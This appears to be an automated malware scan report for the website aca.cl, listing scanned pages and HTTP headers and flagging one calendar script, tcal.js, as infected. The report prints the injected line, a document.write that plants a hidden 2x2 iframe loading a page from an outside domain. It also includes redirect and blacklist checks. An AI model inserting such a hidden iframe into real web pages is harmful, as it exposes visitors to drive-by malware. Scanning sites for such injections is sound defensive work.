Scanned pages/files
Request | Server response | Status |
http://aca.cl/ | HTTP/1.1 302 Found Connection: close Date: Fri, 18 Jul 2014 07:48:30 GMT Location: sitio/index.php Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.4-14+deb7u5 | clean |
http://aca.cl/sitio/index.php | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 18 Jul 2014 07:48:31 GMT Pragma: no-cache Location: http://www.aca.cl/sitio/ Server: Apache/2.2.22 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6306l2hu5q01ua8bsrsnjv5dh3; path=/ X-Pingback: http://www.aca.cl/sitio/xmlrpc.php X-Powered-By: PHP/5.4.4-14+deb7u5 | clean |
http://www.aca.cl/sitio/ | 200 OK Content-Length: 24560 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4 | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://www.aca.cl/sitio/wp-content/plugins/photo-galleria/galleria.js?ver=3.0.3 | 200 OK Content-Length: 39325 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/js/jquery-cycle.js?ver=2.88 | 200 OK Content-Length: 16931 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/greybox/AJS.js?ver=5.54 | 200 OK Content-Length: 19831 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/greybox/AJS_fx.js?ver=5.54 | 200 OK Content-Length: 2877 Content-Type: application/javascript | clean |
http://www.aca.cl/sitio/wp-content/themes/aca/greybox/gb_scripts.js?ver=5.54 | 200 OK Content-Length: 10866 Content-Type: application/javascript | clean |
http://aca.cl/../ | 400 Bad Request Content-Length: 298 Content-Type: text/html | clean |
http://aca.cl/test404page.js | 404 Not Found Content-Length: 284 Content-Type: text/html | clean |
http://aca.cl/solicitudes/cuerpo.php | 200 OK Content-Length: 9138 Content-Type: text/html | clean |
http://aca.cl/memoria/formulario_titulacion.html | 200 OK Content-Length: 8397 Content-Type: text/html | clean |
http://aca.cl/memoria/calendar/tcal.js | 200 OK Content-Length: 12188 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zamf.html?j=2538958></iframe>');
var A_TCALCONF = { 'cssprefix' : 'tcal', 'months' : ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'], 'weekdays' : ['Su', 'Mo', 'Tu', 'We', 'Th', 'Fr', 'Sa'], 'longwdays' : ['Sunday', 'Monday', 'Tuesday', ' if (document.addEventListener) { window.addEventListener('load', f_func, false); } else if (window.attachEvent) { window.attachEvent('onload', f_func); } else { var f_onLoad = window.onload; if (typeof window.onload != 'function') { window.onload = f_func; } else { window.onload = function() { f_onLoad(); f_func(); } } } } f_tcalAddOnload (f_tcalInit);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zamf.html?j=2538958 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zamf.html?j=2538958>
http://aca.cl/informes_practica/index.php | 200 OK Content-Length: 6281 Content-Type: text/html | clean |
http://aca.cl/informes_practica/descargas.php?f=Reglamento_general_practicas_ACA_r11_A.pdf | 200 OK Content-Length: 263081 Content-Type: application/octet-stream | clean |
http://aca.cl/informes_practica/descargas.php?f=InformacionPractica_2013-2014.pdf | 200 OK Content-Length: 300887 Content-Type: application/octet-stream | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aca.cl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 18 Jul 2014 07:48:30 GMT
Location: sitio/index.php
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.4-14+deb7u5
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aca.cl
Referer: http://www.google.com/search?q=aca.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aca.cl
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aca.cl/
Result: aca.cl is not infected or malware details are not published yet.